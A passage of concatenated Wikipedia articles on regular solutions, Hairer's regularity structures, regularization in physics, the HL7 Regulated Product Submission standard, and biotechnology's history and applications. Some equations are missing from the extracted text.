where R {\displaystyle R\,} is the gas constant , n {\displaystyle n\,} the total number of moles , and x i {\displaystyle x_{i}\,} the mole fraction of each component. Only the enthalpy of mixing is non-zero, unlike for an ideal solution, while the volume of the solution equals the sum of volumes of components.
A regular solution can also be described by Raoult's law modified with a Margules function with only one parameter α {\displaystyle \alpha } :
where the Margules function is
Notice that the Margules function for each component contains the mole fraction of the other component. It can also be shown using the Gibbs-Duhem relation that if the first Margules expression holds, then the other one must have the same shape. A regular solutions internal energy will vary during mixing or during process.
The value of α {\displaystyle \alpha } can be interpreted as W/RT , where W = 2 U 12 - U 11 - U 22 represents the difference in interaction energy between like and unlike neighbors.
In contrast to ideal solutions, regular solutions do possess a non-zero enthalpy of mixing, due to the W term. If the unlike interactions are more unfavorable than the like ones, we get competition between an entropy of mixing term that produces a minimum in the Gibbs free energy at x 1 = 0.5 and the enthalpy term that has a maximum there. At high temperatures, the entropic term in the free energy of mixing dominates and the system is fully miscible, but at lower temperatures the G ( x 1 ) curve will have two minima and a maximum in between. This results in phase separation. In general there will be a temperature where the three extremes coalesce and the system becomes fully miscible. This point is known as the upper critical solution temperature or the upper consolute temperature.
In contrast to ideal solutions, the volumes in the case of regular solutions are no longer strictly additive but must be calculated from partial molar volumes that are a function of x 1 .
The term was introduced in 1927 by the American physical chemist Joel Henry Hildebrand . [ 4 ] | https://en.wikipedia.org/wiki/Regular_solution |
Martin Hairer 's theory of regularity structures provides a framework for studying a large class of subcritical parabolic stochastic partial differential equations arising from quantum field theory . [ 1 ] The framework covers the Kardar–Parisi–Zhang equation , the Φ 3 4 {\displaystyle \Phi _{3}^{4}} equation and the parabolic Anderson model, all of which require renormalization in order to have a well-defined notion of solution.
A key advantage of regularity structures over previous methods is its ability to pose the solution of singular non-linear stochastic equations in terms of fixed-point arguments in a space of “controlled distributions” over a fixed regularity structure. The space of controlled distributions lives in an analytical/algebraic space that is constructed to encode key properties of the equations at hand. As in many similar approaches, the existence of this fixed point is first poised as a similar problem where the noise term is regularised. Subsequently, the regularisation is removed as a limit process. A key difficulty in these problems is to show that stochastic objects associated to these equations converge as this regularisation is removed.
Hairer won the 2021 Breakthrough Prize in mathematics for introducing regularity structures. [ 2 ]
A regularity structure is a triple T = ( A , T , G ) {\displaystyle {\mathcal {T}}=(A,T,G)} consisting of:
A further key notion in the theory of regularity structures is that of a model for a regularity structure, which is a concrete way of associating to any τ ∈ T {\displaystyle \tau \in T} and x 0 ∈ R d {\displaystyle x_{0}\in \mathbb {R} ^{d}} a "Taylor polynomial" based at x 0 {\displaystyle x_{0}} and represented by τ {\displaystyle \tau } , subject to some consistency requirements.
More precisely, a model for T = ( A , T , G ) {\displaystyle {\mathcal {T}}=(A,T,G)} on R d {\displaystyle \mathbb {R} ^{d}} , with d ≥ 1 {\displaystyle d\geq 1} consists of two maps
Thus, Π {\displaystyle \Pi } assigns to each point x {\displaystyle x} a linear map Π x {\displaystyle \Pi _{x}} , which is a linear map from T {\displaystyle T} into the space of distributions on R d {\displaystyle \mathbb {R} ^{d}} ; Γ {\displaystyle \Gamma } assigns to any two points x {\displaystyle x} and y {\displaystyle y} a bounded operator Γ x y {\displaystyle \Gamma _{xy}} , which has the role of converting an expansion based at y {\displaystyle y} into one based at x {\displaystyle x} . These maps Π {\displaystyle \Pi } and Γ {\displaystyle \Gamma } are required to satisfy the algebraic conditions
and the analytic conditions that, given any r > | inf A | {\displaystyle r>|\inf A|} , any compact set K ⊂ R d {\displaystyle K\subset \mathbb {R} ^{d}} , and any γ > 0 {\displaystyle \gamma >0} , there exists a constant C > 0 {\displaystyle C>0} such that the bounds
hold uniformly for all r {\displaystyle r} -times continuously differentiable test functions φ : R d → R {\displaystyle \varphi \colon \mathbb {R} ^{d}\to \mathbb {R} } with unit C r {\displaystyle {\mathcal {C}}^{r}} norm, supported in the unit ball about the origin in R d {\displaystyle \mathbb {R} ^{d}} , for all points x , y ∈ K {\displaystyle x,y\in K} , all 0 < λ ≤ 1 {\displaystyle 0<\lambda \leq 1} , and all τ ∈ T α {\displaystyle \tau \in T_{\alpha }} with β < α ≤ γ {\displaystyle \beta <\alpha \leq \gamma } . Here φ x λ : R d → R {\displaystyle \varphi _{x}^{\lambda }\colon \mathbb {R} ^{d}\to \mathbb {R} } denotes the shifted and scaled version of φ {\displaystyle \varphi } given by
This mathematical analysis –related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Regularity_structure |
In physics , especially quantum field theory , regularization is a method of modifying observables which have singularities in order to make them finite by the introduction of a suitable parameter called the regulator . The regulator, also known as a "cutoff", models our lack of knowledge about physics at unobserved scales (e.g. scales of small size or large energy levels). It compensates for (and requires) the possibility of separation of scales that "new physics" may be discovered at those scales which the present theory is unable to model, while enabling the current theory to give accurate predictions as an "effective theory" within its intended scale of use.
It is distinct from renormalization , another technique to control infinities without assuming new physics, by adjusting for self-interaction feedback.
Regularization was for many decades controversial even amongst its inventors, as it combines physical and epistemological claims into the same equations. However, it is now well understood and has proven to yield useful, accurate predictions.
Regularization procedures deal with infinite, divergent, and nonsensical expressions by introducing an auxiliary concept of a regulator (for example, the minimal distance ϵ {\displaystyle \epsilon } in space which is useful, in case the divergences arise from short-distance physical effects). The correct physical result is obtained in the limit in which the regulator goes away (in our example, ϵ → 0 {\displaystyle \epsilon \to 0} ), but the virtue of the regulator is that for its finite value, the result is finite.
However, the result usually includes terms proportional to expressions like 1 / ϵ {\displaystyle 1/\epsilon } which are not well-defined in the limit ϵ → 0 {\displaystyle \epsilon \to 0} . Regularization is the first step towards obtaining a completely finite and meaningful result; in quantum field theory it must be usually followed by a related, but independent technique called renormalization . Renormalization is based on the requirement that some physical quantities — expressed by seemingly divergent expressions such as 1 / ϵ {\displaystyle 1/\epsilon } — are equal to the observed values. Such a constraint allows one to calculate a finite value for many other quantities that looked divergent.
The existence of a limit as ε goes to zero and the independence of the final result from the regulator are nontrivial facts. The underlying reason for them lies in universality as shown by Kenneth Wilson and Leo Kadanoff and the existence of a second order phase transition . Sometimes, taking the limit as ε goes to zero is not possible. This is the case when we have a Landau pole and for nonrenormalizable couplings like the Fermi interaction . However, even for these two examples, if the regulator only gives reasonable results for ϵ ≫ ℏ c / Λ {\displaystyle \epsilon \gg \hbar c/\Lambda } (where Λ {\displaystyle \Lambda } is a superior energy cuttoff) and we are working with scales of the order of ℏ c / Λ ′ {\displaystyle \hbar c/\Lambda '} , regulators with ℏ c / Λ ≪ ϵ ≪ ℏ c / Λ ′ {\displaystyle \hbar c/\Lambda \ll \epsilon \ll \hbar c/\Lambda '} still give pretty accurate approximations. The physical reason why we can't take the limit of ε going to zero is the existence of new physics below Λ.
It is not always possible to define a regularization such that the limit of ε going to zero is independent of the regularization. In this case, one says that the theory contains an anomaly . Anomalous theories have been studied in great detail and are often founded on the celebrated Atiyah–Singer index theorem or variations thereof (see, for example, the chiral anomaly ).
The problem of infinities first arose in the classical electrodynamics of point particles in the 19th and early 20th century.
The mass of a charged particle should include the mass–energy in its electrostatic field ( electromagnetic mass ). Assume that the particle is a charged spherical shell of radius r e . The mass–energy in the field is
which becomes infinite as r e → 0 . This implies that the point particle would have infinite inertia , making it unable to be accelerated. Incidentally, the value of r e that makes m e m {\displaystyle m_{\mathrm {em} }} equal to the electron mass is called the classical electron radius , which (setting q = e {\displaystyle q=e} and restoring factors of c and ε 0 {\displaystyle \varepsilon _{0}} ) turns out to be
where α ≈ 1 / 137.040 {\displaystyle \alpha \approx 1/137.040} is the fine-structure constant , and ℏ / m e c {\displaystyle \hbar /m_{\mathrm {e} }c} is the Compton wavelength of the electron.
Regularization: Classical physics theory breaks down at small scales, e.g., the difference between an electron and a point particle shown above. Addressing this problem requires new kinds of additional physical constraints. For instance, in this case, assuming a finite electron radius (i.e., regularizing the electron mass-energy) suffices to explain the system below a certain size. Similar regularization arguments work in other renormalization problems. For example, a theory may hold under one narrow set of conditions, but due to calculations involving infinities or singularities, it may breakdown under other conditions or scales. In the case of the electron, another way to avoid infinite mass-energy while retaining the point nature of the particle is to postulate tiny additional dimensions over which the particle could 'spread out' rather than restrict its motion solely over 3D space. This is precisely the motivation behind string theory and other multi-dimensional models including multiple time dimensions . Rather than the existence of unknown new physics, assuming the existence of particle interactions with other surrounding particles in the environment, renormalization offers an alternative strategy to resolve infinities in such classical problems.
Specific types of regularization procedures include
Perturbative predictions by quantum field theory about quantum scattering of elementary particles , implied by a corresponding Lagrangian density, are computed using the Feynman rules , a regularization method to circumvent ultraviolet divergences so as to obtain finite results for Feynman diagrams containing loops, and a renormalization scheme. Regularization method results in regularized n-point Green's functions ( propagators ), and a suitable limiting procedure (a renormalization scheme) then leads to perturbative S-matrix elements. These are independent of the particular regularization method used, and enable one to model perturbatively the measurable physical processes (cross sections, probability amplitudes, decay widths and lifetimes of excited states). However, so far no known regularized n-point Green's functions can be regarded as being based on a physically realistic theory of quantum-scattering since the derivation of each disregards some of the basic tenets of conventional physics (e.g., by not being Lorentz-invariant , by introducing either unphysical particles with a negative metric or wrong statistics, or discrete space-time, or lowering the dimensionality of space-time, or some combination thereof). So the available regularization methods are understood as formalistic technical devices, devoid of any direct physical meaning. In addition, there are qualms about renormalization. For a history and comments on this more than half-a-century old open conceptual problem, see e.g. [ 3 ] [ 4 ] [ 5 ]
As it seems that the vertices of non-regularized Feynman series adequately describe interactions in quantum scattering, it is taken that their ultraviolet divergences are due to the asymptotic, high-energy behavior of the Feynman propagators. So it is a prudent, conservative approach to retain the vertices in Feynman series, and modify only the Feynman propagators to create a regularized Feynman series. This is the reasoning behind the formal Pauli–Villars covariant regularization by modification of Feynman propagators through auxiliary unphysical particles, cf. [ 6 ] and representation of physical reality by Feynman diagrams.
In 1949 Pauli conjectured there is a realistic regularization, which is implied by a theory that respects all the established principles of contemporary physics. [ 6 ] [ 7 ] So its propagators (i) do not need to be regularized, and (ii) can be regarded as such a regularization of the propagators used in quantum field theories that might reflect the underlying physics. The additional parameters of such a theory do not need to be removed (i.e. the theory needs no renormalization) and may provide some new information about the physics of quantum scattering, though they may turn out experimentally to be negligible. By contrast, any present regularization method introduces formal coefficients that must eventually be disposed of by renormalization.
Paul Dirac was persistently, extremely critical about procedures of renormalization. In 1963, he wrote, "… in the renormalization theory we have a theory that has defied all the attempts of the mathematician to make it sound. I am inclined to suspect that the renormalization theory is something that will not survive in the future,…" [ 8 ] He further observed that "One can distinguish between two main procedures for a theoretical physicist. One of them is to work from the experimental basis ... The other procedure is to work from the mathematical basis. One examines and criticizes the existing theory. One tries to pin-point the faults in it and then tries to remove them. The difficulty here is to remove the faults without destroying the very great successes of the existing theory." [ 9 ]
Abdus Salam remarked in 1972, "Field-theoretic infinities first encountered in Lorentz's computation of electron have persisted in classical electrodynamics for seventy and in quantum electrodynamics for some thirty-five years. These long years of frustration have left in the subject a curious affection for the infinities and a passionate belief that they are an inevitable part of nature; so much so that even the suggestion of a hope that they may after all be circumvented - and finite values for the renormalization constants computed - is considered irrational." [ 10 ] [ 11 ]
However, in Gerard ’t Hooft ’s opinion, "History tells us that if we hit upon some obstacle, even if it looks like a pure formality or just a technical complication, it should be carefully scrutinized. Nature might be telling us something, and we should find out what it is." [ 12 ]
The difficulty with a realistic regularization is that so far there is none, although nothing could be destroyed by its bottom-up approach; and there is no experimental basis for it.
Considering distinct theoretical problems, Dirac in 1963 suggested: "I believe separate ideas will be needed to solve these distinct problems and that they will be solved one at a time through successive stages in the future evolution of physics. At this point I find myself in disagreement with most physicists. They are inclined to think one master idea will be discovered that will solve all these problems together. I think it is asking too much to hope that anyone will be able to solve all these problems together. One should separate them one from another as much as possible and try to tackle them separately. And I believe the future development of physics will consist of solving them one at a time, and that after any one of them has been solved there will still be a great mystery about how to attack further ones." [ 8 ]
According to Dirac, " Quantum electrodynamics is the domain of physics that we know most about, and presumably it will have to be put in order before we can hope to make any fundamental progress with other field theories, although these will continue to develop on the experimental basis." [ 9 ]
Dirac’s two preceding remarks suggest that we should start searching for a realistic regularization in the case of quantum electrodynamics (QED) in the four-dimensional Minkowski spacetime , starting with the original QED Lagrangian density. [ 8 ] [ 9 ]
The path-integral formulation provides the most direct way from the Lagrangian density to the corresponding Feynman series in its Lorentz-invariant form. [ 5 ] The free-field part of the Lagrangian density determines the Feynman propagators, whereas the rest determines the vertices. As the QED vertices are considered to adequately describe interactions in QED scattering, it makes sense to modify only the free-field part of the Lagrangian density so as to obtain such regularized Feynman series that the Lehmann–Symanzik–Zimmermann reduction formula provides a perturbative S-matrix that: (i) is Lorentz-invariant and unitary; (ii) involves only the QED particles; (iii) depends solely on QED parameters and those introduced by the modification of the Feynman propagators—for particular values of these parameters it is equal to the QED perturbative S-matrix; and (iv) exhibits the same symmetries as the QED perturbative S-matrix. Let us refer to such a regularization as the minimal realistic regularization , and start searching for the corresponding, modified free-field parts of the QED Lagrangian density.
According to Bjorken and Drell , it would make physical sense to sidestep ultraviolet divergences by using more detailed description than can be provided by differential field equations. And Feynman noted about the use of differential equations: "... for neutron diffusion it is only an approximation that is good when the distance over which we are looking is large compared with the mean free path. If we looked more closely, we would see individual neutrons running around." And then he wondered, "Could it be that the real world consists of little X-ons which can be seen only at very tiny distances? And that in our measurements we are always observing on such a large scale that we can’t see these little X-ons, and that is why we get the differential equations? ... Are they [therefore] also correct only as a smoothed-out imitation of a really much more complicated microscopic world?" [ 13 ]
Already in 1938, Heisenberg [ 14 ] proposed that a quantum field theory can provide only an idealized, large-scale description of quantum dynamics, valid for distances larger than some fundamental length , expected also by Bjorken and Drell in 1965 . Feynman's preceding remark provides a possible physical reason for its existence; either that or it is just another way of saying the same thing (there is a fundamental unit of distance) but having no new information.
The need for regularization terms in any quantum field theory of quantum gravity is a major motivation for physics beyond the standard model . Infinities of the non-gravitational forces in QFT can be controlled via renormalization only but additional regularization - and hence new physics—is required uniquely for gravity. The regularizers model, and work around, the breakdown of QFT at small scales and thus show clearly the need for some other theory to come into play beyond QFT at these scales. A. Zee (Quantum Field Theory in a Nutshell, 2003) considers this to be a benefit of the regularization framework—theories can work well in their intended domains but also contain information about their own limitations and point clearly to where new physics is needed. | https://en.wikipedia.org/wiki/Regularization_(physics) |
Regulated Product Submission (RPS) is a Health Level Seven (HL7) standard designed to facilitate the processing and review of regulated product information. [ 1 ] RPS is being developed in response to performance goals that the U.S. Food and Drug Administration (FDA) is to achieve by 2012, as outlined in the Prescription Drug User Fee Act (PDUFA). [ 2 ] In addition to the U.S., regulatory agencies from Europe , Canada , and Japan are at varying levels of interest and participation. [ 2 ] Currently, the second release of RPS is in development. [ 2 ]
Authorities such as the FDA receive numerous submissions that address a variety of regulatory issues. The information contained in these submissions is divided into large numbers of files, both paper and electronic. Often, files in one submission are related to files in earlier submissions. Because the information is divided into numerous files sent over time, it can be difficult to efficiently process and review the information.
While the general data layouts of all regulated products are the same, different product types have different lists of topics that must be addressed within the submission. Therefore, the goal of RPS is to create an HL7 XML message standard for submitting information to regulatory authorities. [ 3 ] Each message includes the contents of a regulatory submission plus information such as metadata , which is necessary to process submissions. [ 4 ] The Refined Message Information Model (R-MIM) shows the structure of a message as a color-coded diagram. R-MIM diagrams are designed to capture all required information for the efficient processing and review of regulatory submissions and to explain what each message consists of. This makes RPS general enough to handle all regulated products while containing enough information to allow regulators to support structured review. [ 4 ]
The project to develop a regulated product submission standard was initiated on June 22, 2005. [ 4 ] Release 1 was spearheaded by Jason Rock of GlobalSubmit, with the aim of creating one standardized submission format to support all of the FDA's electronic product submissions. The Health Level 7 message was created by leveraging existing human pharmaceutical experience, such as The International Conference on Harmonisation of Technical Requirements for Registration of Pharmaceuticals for Human Use (ICH). [ 4 ] RPS Release 1 provides the capability to cross-reference previously submitted material owned by the sponsor as well as append, replace and delete parts of the document lifecycle. [ 5 ] Release 2, led by Peggy Leizear of the Office of Planning at the FDA, grants the ability to exchange contact information, classify submission content and handle multi-region submissions. [ 5 ] The second release of RPS also handles two-way communication—The regulatory authority (e.g. FDA) will use RPS to send correspondence (e.g. request for additional information, meeting minutes, application approval) to the submitter. [ 5 ]
As the industry moves away from paper submissions, global companies producing regulated products will benefit from having a published electronic submission standard. The label of “regulated product” applies not only to pharmaceuticals, but also extends to include food additives, medical devices and radiologics, human therapeutics, biologics, tobacco products and veterinary products. [ 2 ]
The submitted information is structured as a collection of documents, organized by report sections. Multiple documents can be assigned to a single report section. The actual table of required and optional report sections varies from product to product and is defined by regulatory authorities. Since the same information can be submitted to support multiple applications, it is imperative that RPS allow for the reuse of data between applications.
RPS is in many ways comparable to the electronic Common Technical Document . [ 4 ] Ideally, the FDA would like to implement RPS as the next iteration of eCTD.
The idea behind RPS and ICH’s eCTD is the same—the use of a standardized format for regulatory submissions, including PDF documents and SAS datasets. [ 2 ] Although document contents are the same for eCTD and RPS, the internal XML structures are very different. [ 2 ] RPS will offer two obvious advantages over eCTD. First, RPS will establish two-way communication between the submitter and all FDA-regulated product centers within the agency. [ 2 ] Second, RPS will manage the life cycle of submissions by allowing cross-referencing of previously submitted information. [ 2 ] This means that for electronic Investigational New Drug (IND) applications, New Drug Applications (NDA), and Biologic License Applications (BLAs), information need only be submitted once and previously submitted electronic documents can be applied to marketing applications. [ 2 ] With RPS, archived electronic IND, NDA, and BLA submissions will be retrievable through standardized automated links. [ 2 ] eCTD lacks this cross-referencing capability. [ 2 ]
Release 3 will be headed by ICH. The goal of release three is to have more international requirements. The HL7 standard will be implemented first at the Center for Drug Evaluation and Research (CDER) and Center for Biologics Evaluation and Research (CBER) in late 2011, before being rolled out to the other centers using a yet-to-be-determined schedule. Both centers will implement Release 2 of RPS, which barely passed ballot as a Draft Standard for Trial Use (DSTU) in January 2010. [ 6 ] The ballot passed by two votes with a result of 53 affirmative and 33 negative. [ 6 ] Testing by FDA is expected to begin at the beginning of the third quarter, 2010. [ 6 ] When RPS is implemented, FDA will offer a training program for reviewers, including hands-on training classes. [ 2 ] | https://en.wikipedia.org/wiki/Regulated_Product_Submissions |
Biotechnology is a multidisciplinary field that involves the integration of natural sciences and engineering sciences in order to achieve the application of organisms and parts thereof for products and services. [ 1 ] Specialists in the field are known as biotechnologists .
The term biotechnology was first used by Károly Ereky in 1919 [ 2 ] to refer to the production of products from raw materials with the aid of living organisms. The core principle of biotechnology involves harnessing biological systems and organisms, such as bacteria, yeast , and plants, to perform specific tasks or produce valuable substances.
Biotechnology had a significant impact on many areas of society, from medicine to agriculture to environmental science . One of the key techniques used in biotechnology is genetic engineering , which allows scientists to modify the genetic makeup of organisms to achieve desired outcomes. This can involve inserting genes from one organism into another, and consequently, create new traits or modifying existing ones. [ 3 ]
Other important techniques used in biotechnology include tissue culture, which allows researchers to grow cells and tissues in the lab for research and medical purposes, and fermentation , which is used to produce a wide range of products such as beer, wine, and cheese.
The applications of biotechnology are diverse and have led to the development of products like life-saving drugs, biofuels , genetically modified crops, and innovative materials. [ 4 ] It has also been used to address environmental challenges, such as developing biodegradable plastics and using microorganisms to clean up contaminated sites.
Biotechnology is a rapidly evolving field with significant potential to address pressing global challenges and improve the quality of life for people around the world; however, despite its numerous benefits, it also poses ethical and societal challenges, such as questions around genetic modification and intellectual property rights . As a result, there is ongoing debate and regulation surrounding the use and application of biotechnology in various industries and fields. [ 5 ]
The concept of biotechnology encompasses a wide range of procedures for modifying living organisms for human purposes, going back to domestication of animals, cultivation of plants, and "improvements" to these through breeding programs that employ artificial selection and hybridization . Modern usage also includes genetic engineering, as well as cell and tissue culture technologies. The American Chemical Society defines biotechnology as the application of biological organisms, systems, or processes by various industries to learning about the science of life and the improvement of the value of materials and organisms, such as pharmaceuticals, crops, and livestock . [ 6 ] As per the European Federation of Biotechnology , biotechnology is the integration of natural science and organisms, cells, parts thereof, and molecular analogues for products and services. [ 7 ] Biotechnology is based on the basic biological sciences (e.g., molecular biology , biochemistry , cell biology , embryology , genetics , microbiology ) and conversely provides methods to support and perform basic research in biology. [ citation needed ]
Biotechnology is the research and development in the laboratory using bioinformatics for exploration, extraction, exploitation, and production from any living organisms and any source of biomass by means of biochemical engineering where high value-added products could be planned (reproduced by biosynthesis , for example), forecasted, formulated, developed, manufactured, and marketed for the purpose of sustainable operations (for the return from bottomless initial investment on R & D) and gaining durable patents rights (for exclusives rights for sales, and prior to this to receive national and international approval from the results on animal experiment and human experiment, especially on the pharmaceutical branch of biotechnology to prevent any undetected side-effects or safety concerns by using the products). [ 8 ] [ 9 ] [ 10 ] The utilization of biological processes, organisms or systems to produce products that are anticipated to improve human lives is termed biotechnology. [ 11 ]
By contrast, bioengineering is generally thought of as a related field that more heavily emphasizes higher systems approaches (not necessarily the altering or using of biological materials directly ) for interfacing with and utilizing living things. Bioengineering is the application of the principles of engineering and natural sciences to tissues, cells, and molecules. This can be considered as the use of knowledge from working with and manipulating biology to achieve a result that can improve functions in plants and animals. [ 12 ] Relatedly, biomedical engineering is an overlapping field that often draws upon and applies biotechnology (by various definitions), especially in certain sub-fields of biomedical or chemical engineering such as tissue engineering , biopharmaceutical engineering , and genetic engineering . [ citation needed ]
Although not normally what first comes to mind, many forms of human-derived agriculture clearly fit the broad definition of "utilizing a biotechnological system to make products". Indeed, the cultivation of plants may be viewed as the earliest biotechnological enterprise. [ citation needed ]
Agriculture has been theorized to have become the dominant way of producing food since the Neolithic Revolution . Through early biotechnology, the earliest farmers selected and bred the best-suited crops (e.g., those with the highest yields) to produce enough food to support a growing population. As crops and fields became increasingly large and difficult to maintain, it was discovered that specific organisms and their by-products could effectively fertilize , restore nitrogen , and control pests . Throughout the history of agriculture, farmers have inadvertently altered the genetics of their crops through introducing them to new environments and breeding them with other plants — one of the first forms of biotechnology. [ clarification needed ]
These processes also were included in early fermentation of beer . [ 13 ] These processes were introduced in early Mesopotamia , Egypt , China and India , and still use the same basic biological methods. In brewing , malted grains (containing enzymes ) convert starch from grains into sugar and then adding specific yeasts to produce beer. In this process, carbohydrates in the grains broke down into alcohols, such as ethanol. Later, other cultures produced the process of lactic acid fermentation , which produced other preserved foods, such as soy sauce . Fermentation was also used in this time period to produce leavened bread . Although the process of fermentation was not fully understood until Louis Pasteur 's work in 1857, it is still the first use of biotechnology to convert a food source into another form. [ citation needed ]
Before the time of Charles Darwin 's work and life, animal and plant scientists had already used selective breeding. Darwin added to that body of work with his scientific observations about the ability of science to change species. These accounts contributed to Darwin's theory of natural selection. [ 14 ]
For thousands of years, humans have used selective breeding to improve the production of crops and livestock to use them for food. In selective breeding, organisms with desirable characteristics are mated to produce offspring with the same characteristics. For example, this technique was used with corn to produce the largest and sweetest crops. [ 15 ]
In the early twentieth century scientists gained a greater understanding of microbiology and explored ways of manufacturing specific products. In 1917, Chaim Weizmann first used a pure microbiological culture in an industrial process, that of manufacturing corn starch using Clostridium acetobutylicum , to produce acetone , which the United Kingdom desperately needed to manufacture explosives during World War I . [ 16 ]
Biotechnology has also led to the development of antibiotics. In 1928, Alexander Fleming discovered the mold Penicillium . His work led to the purification of the antibiotic formed by the mold by Howard Florey , Ernst Boris Chain and Norman Heatley – to form what we today know as penicillin . In 1940, penicillin became available for medicinal use to treat bacterial infections in humans. [ 15 ]
The field of modern biotechnology is generally thought of as having been born in 1971 when Paul Berg's (Stanford) experiments in gene splicing had early success. Herbert W. Boyer (Univ. Calif. at San Francisco) and Stanley N. Cohen (Stanford) significantly advanced the new technology in 1972 by transferring genetic material into a bacterium, such that the imported material would be reproduced. The commercial viability of a biotechnology industry was significantly expanded on June 16, 1980, when the United States Supreme Court ruled that a genetically modified microorganism could be patented in the case of Diamond v. Chakrabarty . [ 17 ] Indian-born Ananda Chakrabarty , working for General Electric , had modified a bacterium (of the genus Pseudomonas ) capable of breaking down crude oil, which he proposed to use in treating oil spills. (Chakrabarty's work did not involve gene manipulation but rather the transfer of entire organelles between strains of the Pseudomonas bacterium). [ citation needed ]
The MOSFET invented at Bell Labs between 1955 and 1960, [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] Two years later, Leland C. Clark and Champ Lyons invented the first biosensor in 1962. [ 24 ] [ 25 ] Biosensor MOSFETs were later developed, and they have since been widely used to measure physical , chemical , biological and environmental parameters. [ 26 ] The first BioFET was the ion-sensitive field-effect transistor (ISFET), invented by Piet Bergveld in 1970. [ 27 ] [ 28 ] It is a special type of MOSFET, [ 26 ] where the metal gate is replaced by an ion -sensitive membrane , electrolyte solution and reference electrode . [ 29 ] The ISFET is widely used in biomedical applications, such as the detection of DNA hybridization , biomarker detection from blood , antibody detection, glucose measurement, pH sensing, and genetic technology . [ 29 ]
By the mid-1980s, other BioFETs had been developed, including the gas sensor FET (GASFET), pressure sensor FET (PRESSFET), chemical field-effect transistor (ChemFET), reference ISFET (REFET), enzyme-modified FET (ENFET) and immunologically modified FET (IMFET). [ 26 ] By the early 2000s, BioFETs such as the DNA field-effect transistor (DNAFET), gene-modified FET (GenFET) and cell-potential BioFET (CPFET) had been developed. [ 29 ]
A factor influencing the biotechnology sector's success is improved intellectual property rights legislation—and enforcement—worldwide, as well as strengthened demand for medical and pharmaceutical products. [ 30 ]
Rising demand for biofuels is expected to be good news for the biotechnology sector, with the Department of Energy estimating ethanol usage could reduce U.S. petroleum-derived fuel consumption by up to 30% by 2030. The biotechnology sector has allowed the U.S. farming industry to rapidly increase its supply of corn and soybeans—the main inputs into biofuels—by developing genetically modified seeds that resist pests and drought. By increasing farm productivity, biotechnology boosts biofuel production. [ 31 ]
Biotechnology has applications in four major industrial areas, including health care (medical), crop production and agriculture, non-food (industrial) uses of crops and other products (e.g., biodegradable plastics , vegetable oil , biofuels ), and environmental uses. [ 32 ]
For example, one application of biotechnology is the directed use of microorganisms for the manufacture of organic products (examples include beer and milk products). Another example is using naturally present bacteria by the mining industry in bioleaching . [ citation needed ] Biotechnology is also used to recycle, treat waste, clean up sites contaminated by industrial activities ( bioremediation ), and also to produce biological weapons .
A series of derived terms have been coined to identify several branches of biotechnology, for example:
In medicine, modern biotechnology has many applications in areas such as pharmaceutical drug discoveries and production, pharmacogenomics , and genetic testing (or genetic screening ). In 2021, nearly 40% of the total company value of pharmaceutical biotech companies worldwide were active in Oncology with Neurology and Rare Diseases being the other two big applications. [ 43 ]
Pharmacogenomics (a combination of pharmacology and genomics ) is the technology that analyses how genetic makeup affects an individual's response to drugs. [ 44 ] Researchers in the field investigate the influence of genetic variation on drug responses in patients by correlating gene expression or single-nucleotide polymorphisms with a drug's efficacy or toxicity . [ 45 ] The purpose of pharmacogenomics is to develop rational means to optimize drug therapy, with respect to the patients' genotype , to ensure maximum efficacy with minimal adverse effects . [ 46 ] Such approaches promise the advent of " personalized medicine "; in which drugs and drug combinations are optimized for each individual's unique genetic makeup. [ 47 ] [ 48 ]
Biotechnology has contributed to the discovery and manufacturing of traditional small molecule pharmaceutical drugs as well as drugs that are the product of biotechnology – biopharmaceutics . Modern biotechnology can be used to manufacture existing medicines relatively easily and cheaply. The first genetically engineered products were medicines designed to treat human diseases. To cite one example, in 1978 Genentech developed synthetic humanized insulin by joining its gene with a plasmid vector inserted into the bacterium Escherichia coli . Insulin, widely used for the treatment of diabetes, was previously extracted from the pancreas of abattoir animals (cattle or pigs). The genetically engineered bacteria are able to produce large quantities of synthetic human insulin at relatively low cost. [ 49 ] [ 50 ] Biotechnology has also enabled emerging therapeutics like gene therapy . The application of biotechnology to basic science (for example through the Human Genome Project ) has also dramatically improved our understanding of biology and as our scientific knowledge of normal and disease biology has increased, our ability to develop new medicines to treat previously untreatable diseases has increased as well. [ 50 ]
Genetic testing allows the genetic diagnosis of vulnerabilities to inherited diseases , and can also be used to determine a child's parentage (genetic mother and father) or in general a person's ancestry . In addition to studying chromosomes to the level of individual genes, genetic testing in a broader sense includes biochemical tests for the possible presence of genetic diseases, or mutant forms of genes associated with increased risk of developing genetic disorders. Genetic testing identifies changes in chromosomes , genes, or proteins. [ 51 ] Most of the time, testing is used to find changes that are associated with inherited disorders. The results of a genetic test can confirm or rule out a suspected genetic condition or help determine a person's chance of developing or passing on a genetic disorder . As of 2011 several hundred genetic tests were in use. [ 52 ] [ 53 ] Since genetic testing may open up ethical or psychological problems, genetic testing is often accompanied by genetic counseling .
Genetically modified crops ("GM crops", or "biotech crops") are plants used in agriculture , the DNA of which has been modified with genetic engineering techniques. In most cases, the main aim is to introduce a new trait that does not occur naturally in the species. Biotechnology firms can contribute to future food security by improving the nutrition and viability of urban agriculture. Furthermore, the protection of intellectual property rights encourages private sector investment in agrobiotechnology. [ citation needed ]
Examples in food crops include resistance to certain pests, [ 54 ] diseases, [ 55 ] stressful environmental conditions, [ 56 ] resistance to chemical treatments (e.g. resistance to a herbicide [ 57 ] ), reduction of spoilage, [ 58 ] or improving the nutrient profile of the crop. [ 59 ] Examples in non-food crops include production of pharmaceutical agents , [ 60 ] biofuels , [ 61 ] and other industrially useful goods, [ 62 ] as well as for bioremediation . [ 63 ] [ 64 ]
Farmers have widely adopted GM technology. Between 1996 and 2011, the total surface area of land cultivated with GM crops had increased by a factor of 94, from 17,000 to 1,600,000 square kilometers (4,200,000 to 395,400,000 acres). [ 65 ] 10% of the world's crop lands were planted with GM crops in 2010. [ 65 ] As of 2011, 11 different transgenic crops were grown commercially on 395 million acres (160 million hectares) in 29 countries such as the US, Brazil , Argentina , India , Canada, China, Paraguay, Pakistan, South Africa, Uruguay, Bolivia, Australia, Philippines, Myanmar, Burkina Faso, Mexico and Spain. [ 65 ]
